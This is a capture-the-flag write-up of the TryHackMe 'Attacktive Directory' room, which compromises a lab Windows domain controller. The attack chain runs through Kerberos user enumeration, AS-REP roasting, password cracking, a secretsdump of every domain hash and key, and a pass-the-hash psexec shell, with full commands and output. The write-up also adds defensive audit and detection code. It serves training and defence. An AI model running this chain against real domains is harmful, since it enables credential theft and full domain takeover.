Attacktive Directory ~ Try Hack Me


Finally completed my CEH Master certification and found myself lazing around so here we go :)
I SUCK AT WINDOWS EXPLOITATION ~ Nee
Prerequisite
To make life easier I usually add an entry to my hosts file so I can reach the target machine by name.
echo "10.10.117.127 tar.get" >> /etc/hosts

Okay now onto hacking!
Reconnaissance
As always, I fired off an Nmap scan against the target machine.
┌──(nee㉿kali)-[~]
└─$ nmap -Pn -sV -sC -p- -A tar.get
Nmap scan report for tar.get (10.10.117.127)
Host is up (0.35s latency).
Not shown: 65508 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|     bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-10-05 08:45:57Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   ProductVersion: 10.0.17763
|_  System_Time: 2020-10-05T08:48:26+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2020-10-04T08:35:54
|_Not valid after:  2021-04-05T08:35:54
|_ssl-date: 2020-10-05T08:48:41+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
49788/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/5%Time=5F7ADD4A%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-10-05T08:48:27
|_  start_date: N/A
Most of the open ports and running services led me to believe that this was indeed a Windows server, and in fact a domain controller:
- DNS
- Active Directory LDAP
- SMB / RPC
- RDP
Bruteforcing credentials
The room provided two files (a user list and a password list) that aided the brute-force attack.
I used a tool named kerbrute to perform the user enumeration part of the attack.
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ ./kerbrute_linux_amd64 userenum -d spookysec.local --dc 10.10.156.245 userlist.txt

Version: v1.0.3 (9dad6e1) - 10/06/20 - Ronnie Flathers @ropnop

2020/10/06 04:49:07 >  Using KDC(s):
2020/10/06 04:49:07 >   10.10.156.245:88

2020/10/06 04:49:08 >  [+] VALID USERNAME:   james@spookysec.local
2020/10/06 04:49:14 >  [+] VALID USERNAME:   svc-admin@spookysec.local
2020/10/06 04:49:22 >  [+] VALID USERNAME:   James@spookysec.local
2020/10/06 04:49:24 >  [+] VALID USERNAME:   robin@spookysec.local
2020/10/06 04:49:54 >  [+] VALID USERNAME:   darkstar@spookysec.local
2020/10/06 04:50:13 >  [+] VALID USERNAME:   administrator@spookysec.local
2020/10/06 04:50:50 >  [+] VALID USERNAME:   backup@spookysec.local
2020/10/06 04:51:07 >  [+] VALID USERNAME:   paradox@spookysec.local
2020/10/06 04:52:58 >  [+] VALID USERNAME:   JAMES@spookysec.local
2020/10/06 04:53:36 >  [+] VALID USERNAME:   Robin@spookysec.local
This revealed a number of valid usernames, including accounts such as:
- svc-admin
- administrator
- backup
I could possibly use one of these accounts to get into the machine.
Exploiting Kerberos
The attack used here is called AS-REP Roasting. I recently learnt about Kerberoasting and it is very similar. The difference is that AS-REP Roasting applies to user accounts that have the "Does not require Kerberos pre-authentication" option set. This means the account does not have to prove its identity to the KDC before requesting a Kerberos ticket: anyone can ask for an AS-REP for that user, and part of the reply is encrypted with a key derived from the user's password, which can then be cracked offline.
I performed this attack with Impacket's GetNPUsers.py (Impacket/Examples/GetNPUsers.py).
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ GetNPUsers.py spookysec.local/svc-admin -no-pass
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:80f4807ece8bed030287d392722808dd$148464892db58fe257006835567004e0f3f2a856a4608a1cbce3d858251acfe7c41cf80c1d7ec54b0edad691871910c17564afd893c2cc534e88ab8b6b873e4eee228fcf947ede842452747e0fbdaf55ab1c475cceed283d48ddc5aa604ed8ee8ed8727b3b62f77f634c6e09ff719a53246356edef39f2fb8084b014c1fce8478079a956ce5384d5d1d7121b7173297e8a84e3c4914fd7c6d6618a9221cf3c96280c6ddea7f0ddba1541583bbbfc92b57fc1bd22011a7fd70477c6fd8daccc5d0cd88973a5c0607430e652113642a6de607617dd6866568fcad894ab9364902fd1c7670a7dfa1977ae02d62ff1c2593b35e0
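As an added example (not part of the original writeup), here is a small Python audit helper for the two things the section above turns on: the userAccountControl bit that makes an account roastable, and the structure of the line GetNPUsers.py printed. `preauth_disabled()` takes a `{sAMAccountName: userAccountControl}` export (the dictionary here is constructed sample data; the bit values are the documented AD flags) and lists the accounts a defender should fix, and `parse_asrep23()` splits the etype-23 `$krb5asrep$` line from the run above into user, realm, checksum and ciphertext length, which is useful when triaging such a line found in a cracking session or an IR artefact.

```python
import re

# userAccountControl bits (documented Active Directory values) relevant to this audit.
UAC_FLAGS = {
    0x000002: "ACCOUNTDISABLE",
    0x000020: "PASSWD_NOTREQD",
    0x000200: "NORMAL_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWORD",
    0x080000: "TRUSTED_FOR_DELEGATION",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",   # "Do not require Kerberos preauthentication"
}
DONT_REQ_PREAUTH = 0x400000


def decode_uac(value: int) -> list:
    """Names of the set bits in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def preauth_disabled(export: dict) -> list:
    """Accounts in a {sAMAccountName: userAccountControl} export that answer an
    AS-REQ without pre-authentication, i.e. the accounts GetNPUsers.py would list."""
    return sorted(name for name, uac in export.items() if uac & DONT_REQ_PREAUTH)


# Layout of the etype-23 (RC4-HMAC) line GetNPUsers.py emits in john format:
#   $krb5asrep$23$<user>@<REALM>:<16-byte checksum hex>$<encrypted enc-part hex>
_ASREP23 = re.compile(
    r"^\$krb5asrep\$(?P<etype>23)\$(?P<user>[^@]+)@(?P<realm>[^:]+)"
    r":(?P<checksum>[0-9a-fA-F]{32})\$(?P<cipher>[0-9a-fA-F]+)$"
)


def parse_asrep23(line: str) -> dict:
    """Split an etype-23 $krb5asrep$ line into its fields. AES lines (etype 17/18)
    use a different field order and are rejected here rather than misparsed."""
    m = _ASREP23.match(line.strip())
    if m is None:
        raise ValueError("not an etype-23 $krb5asrep$ line")
    return {
        "etype": int(m["etype"]),
        "user": m["user"],
        "realm": m["realm"],
        "checksum": m["checksum"].lower(),
        "cipher_len": len(m["cipher"]) // 2,   # bytes of RC4-encrypted enc-part
    }


# Constructed sample export: only svc-admin has pre-authentication turned off.
SAMPLE_EXPORT = {
    "administrator": 0x000200,   # NORMAL_ACCOUNT
    "backup":        0x010200,   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    "svc-admin":     0x400200,   # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
}

# The AS-REP line from the GetNPUsers.py run above.
PAGE_HASH = (
    "$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:80f4807ece8bed030287d392722808dd$"
    "148464892db58fe257006835567004e0f3f2a856a4608a1cbce3d858251acfe7c41cf80c1d7ec54b0edad691871910c"
    "17564afd893c2cc534e88ab8b6b873e4eee228fcf947ede842452747e0fbdaf55ab1c475cceed283d48ddc5aa604ed8"
    "ee8ed8727b3b62f77f634c6e09ff719a53246356edef39f2fb8084b014c1fce8478079a956ce5384d5d1d7121b71732"
    "97e8a84e3c4914fd7c6d6618a9221cf3c96280c6ddea7f0ddba1541583bbbfc92b57fc1bd22011a7fd70477c6fd8dac"
    "cc5d0cd88973a5c0607430e652113642a6de607617dd6866568fcad894ab9364902fd1c7670a7dfa1977ae02d62ff1c"
    "2593b35e0"
)

if __name__ == "__main__":
    print("pre-auth disabled:", preauth_disabled(SAMPLE_EXPORT))
    print("svc-admin flags:", decode_uac(SAMPLE_EXPORT["svc-admin"]))
    print(parse_asrep23(PAGE_HASH))
```

The fix on the defensive side is simply clearing that bit on `svc-admin` (and, if the account is a service account, moving it to a long random password or a gMSA); the parser makes it obvious that etype 23 was negotiated, which is the RC4 path john cracked so quickly below.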
I was presented with the AS-REP hash for the user account. Moving on, I just had to crack it with john and retrieve the password for that particular account. This is where the wordlist I was given at the beginning came in handy!
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ sudo john hash.txt --wordlist=passwordlist.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
management2005   ($krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL)
1g 0:00:00:00 DONE (2020-10-06 05:15) 100.0g/s 665600p/s 665600c/s 665600C/s horoscope..amy123
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Upon completion I got the password management2005 for the user account svc-admin@spookysec.local.
Connecting to shares via admin account
Now that I had both the username and the password, I used smbclient to list the file shares that the machine offered.
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ smbclient -L spookysec.local -U svc-admin
Enter WORKGROUP\svc-admin's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backup          Disk
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
Now that I had verified that I could access the shares, I tried accessing the backup share.
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ smbclient \\10.10.156.245\backup -U svc-admin                                           1 ⨯
Enter WORKGROUP\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

		8247551 blocks of size 4096. 5269051 blocks available
smb: \>
I was able to successfully connect to the share and noticed a file named backup_credentials.txt. I downloaded the file to my local machine and realized that its contents were base64 encoded.
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> ^C

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ ls                                                                                     130 ⨯
backup_credentials.txt  hash.txt  kerbrute_linux_amd64  passwordlist.txt  userlist.txt

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
After decoding it, I realized that I had the credentials for the backup account found a couple of steps ago.

Dumping hashes
Using the credentials I recovered in the previous step, I used Impacket again (this time secretsdump.py) to dump every user account's NTLM hash and Kerberos keys from the domain controller.
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ secretsdump.py spookysec.local/backup:'backup2517860'
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: [Errno Connection error (spookysec.local/backup:backup2517860:445)] [Errno -2] Name or service not known
[*] Cleaning up...
The first attempt failed because spookysec.local did not resolve from my machine; pointing the tool at the IP address directly (and using -just-dc to pull only the NTDS.DIT secrets) worked.
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ secretsdump.py spookysec.local/backup:'backup2517860'@10.10.156.245 -just-dc
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:8bc3bdcaf0f70c78b7bda16b84032f51:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c431e7e3555aeb5b63cbdfee3024d56f4b7f10eaba6c3f94d9a1524e76a26a49
Administrator:aes128-cts-hmac-sha1-96:f955ac2d89620b2a8dcd9837105445ff
Administrator:des-cbc-md5:6d5edfa173d9d6ae
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:7403d3da9fbb21788d7ded46cfa217a336d219376bf22d5f4ae0bba232e91f06
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:1092c7b99ff5efd56ed960531d76647b
ATTACKTIVEDIREC$:des-cbc-md5:d69de55e08c4a845
[*] Cleaning up...
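A dump like the one above is also what a defender gets from an authorised credential audit, and it already says a lot before anything is cracked. As an added example that is not part of the original writeup, the Python below implements the NT hash (MD4 over the UTF-16LE password, written out because hashlib's MD4 is often missing from modern OpenSSL builds) and uses it to audit the `user:rid:lm:nt:::` lines for three things: an NT hash that matches a banned password (the empty string is one; that is why Guest's hash is the well-known 31d6cf…), a stored LM hash, and identical NT hashes across accounts, which means shared passwords. The sample lines are three rows taken from the dump above plus one constructed row (`legacy`) that exercises the LM and banned-password checks; the deny list is constructed too.

```python
import re
import struct
from collections import defaultdict


# --- MD4 (RFC 1320) -----------------------------------------------------------
def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def _f(x, y, z): return (x & y) | (~x & z)
def _g(x, y, z): return (x & y) | (x & z) | (y & z)
def _h(x, y, z): return x ^ y ^ z

# (round function, message-word order, per-step shifts, additive constant)
_ROUNDS = (
    (_f, list(range(16)),                                         (3, 7, 11, 19), 0x00000000),
    (_g, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15],  (3, 5, 9, 13),  0x5A827999),
    (_h, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15],  (3, 9, 11, 15), 0x6ED9EBA1),
)

def md4(data: bytes) -> bytes:
    bit_len = len(data) * 8
    # pad: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        r = state[:]
        for fn, order, shifts, k in _ROUNDS:
            for j in range(16):
                # registers rotate each step: (a,b,c,d), (d,a,b,c), (c,d,a,b), (b,c,d,a)
                a, b, c, d = (r[(0 - j) % 4], r[(1 - j) % 4], r[(2 - j) % 4], r[(3 - j) % 4])
                r[(0 - j) % 4] = _rotl((a + fn(b, c, d) + x[order[j]] + k) & 0xFFFFFFFF, shifts[j % 4])
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, r)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash as stored in NTDS.DIT: unsalted MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le")).hex()


# --- audit of secretsdump.py -just-dc output -----------------------------------
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"     # LM field when no LM hash is stored
BANNED_PASSWORDS = ["", "password"]                # constructed deny list; use your org's own
BANNED_NT = {nt_hash(p): p for p in BANNED_PASSWORDS}

_DUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)

def audit_dump(lines) -> list:
    """Return (account, finding) pairs for hygiene problems visible in the NT/LM part
    of a secretsdump listing; banner and Kerberos-key lines do not match and are skipped."""
    findings, by_nt = [], defaultdict(list)
    for line in lines:
        m = _DUMP_LINE.match(line.strip())
        if m is None:
            continue
        user, lm, nt = m["user"], m["lm"].lower(), m["nt"].lower()
        if lm != EMPTY_LM:
            findings.append((user, "LM hash stored (LM hashes are trivially reversible)"))
        if nt in BANNED_NT:
            findings.append((user, f"password is the banned value {BANNED_NT[nt]!r}"))
        by_nt[nt].append(user)
    for nt, users in by_nt.items():
        if len(users) > 1 and nt not in BANNED_NT:
            findings.append((", ".join(sorted(users)), "same password (identical NT hash)"))
    return findings


SAMPLE_DUMP = [
    "[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)",
    # rows from the dump above
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "spookysec.local\\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::",
    "spookysec.local\\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::",
    # constructed row: a non-empty LM field and the NT hash of "password"
    "spookysec.local\\legacy:1200:0123456789abcdef0123456789abcdef:8846f7eaee8fb117ad06bdd830b7586c:::",
]

if __name__ == "__main__":
    for account, finding in audit_dump(SAMPLE_DUMP):
        print(f"{account}: {finding}")
```

Because the NT hash is unsalted, the reuse check needs no cracking at all: skidy and breakerofthings share a password the moment their hashes are equal. The same property is what makes the pass-the-hash step in the next section possible, so rotating the Administrator and krbtgt secrets (the latter twice) is the first remediation after a dump like this.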
Accessing administrator account of the machine
Lastly, I used Impacket's psexec.py to perform a pass-the-hash login with the Administrator NT hash from the dump and get a shell as the admin account.
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ psexec.py Administrator@10.10.156.245 -hashes aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.156.245.....
[*] Found writable share ADMIN$
[*] Uploading file xLRsIsYU.exe
[*] Opening SVCManager on 10.10.156.245.....
[*] Creating service dfyb on 10.10.156.245.....
[*] Starting service dfyb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
And...I'm in.
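The psexec.py output above is noisy from the target's point of view: it wrote an executable with a random 8-letter name into ADMIN$ (that is %SystemRoot%) and registered a service with a random 4-letter name, both of which land in the System event log as Event ID 7045 ("A service was installed in the system"). As an added example, not part of the original writeup, here is a small Python detection that scores 7045 records on exactly those two traits. The events are constructed; the first one reproduces the run above, and its full image path is an assumption since the output only shows the file name and the share it went through.

```python
import re
from dataclasses import dataclass

# Two traits visible in the run above: service "dfyb" (4 letters) and the dropped
# binary "xLRsIsYU.exe" (8 letters) sitting directly in %SystemRoot%.
RANDOM_SERVICE_NAME = re.compile(r"^[A-Za-z]{4}$")
RANDOM_EXE_IN_SYSROOT = re.compile(
    r"^(?:%SystemRoot%|C:\\Windows)\\[A-Za-z]{8}\.exe$", re.IGNORECASE
)


@dataclass
class ServiceInstall:
    """The 7045 fields this rule needs (Computer, Service Name, Service File Name)."""
    computer: str
    service_name: str
    image_path: str


def psexec_indicators(evt: ServiceInstall) -> list:
    """Which of the two traits a single 7045 record shows."""
    reasons = []
    if RANDOM_SERVICE_NAME.match(evt.service_name):
        reasons.append("4-letter service name")
    if RANDOM_EXE_IN_SYSROOT.match(evt.image_path):
        reasons.append("8-letter executable directly under %SystemRoot%")
    return reasons


def flag_psexec_like(events) -> list:
    """Alert only when both traits are present: plenty of legitimate services have a
    short name, and plenty of installers drop a binary into C:\\Windows, but the
    combination of random 4 + random 8 is characteristic of this tool's run above.
    Returns (computer, service_name, reasons) tuples."""
    hits = []
    for evt in events:
        reasons = psexec_indicators(evt)
        if len(reasons) == 2:
            hits.append((evt.computer, evt.service_name, reasons))
    return hits


# Constructed sample 7045 records.
SAMPLE_EVENTS = [
    ServiceInstall("AttacktiveDirectory", "dfyb", "%SystemRoot%\\xLRsIsYU.exe"),   # the run above (path assumed)
    ServiceInstall("AttacktiveDirectory", "wlms", "C:\\Windows\\System32\\wlms\\wlms.exe"),  # short name only
    ServiceInstall("WKSTN01", "Sense",
                   "\"C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe\""),
    ServiceInstall("WKSTN01", "vmtools", "C:\\Windows\\vmtools.exe"),            # neither trait
]

if __name__ == "__main__":
    for computer, name, reasons in flag_psexec_like(SAMPLE_EVENTS):
        print(f"{computer}: service {name!r} looks like a remote-exec drop ({'; '.join(reasons)})")
```

In practice this rule sits next to the 4624 logon-type-3 NTLM event from the same source address and the 5145 share-access event for ADMIN$, which together tell the whole story of the session above; the service-name and file-name traits are the cheapest of the three to match and are what the sample encodes.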
That's the end of that box 😩. One of my first Windows boxes! But it turned out to be not too bad I guess :)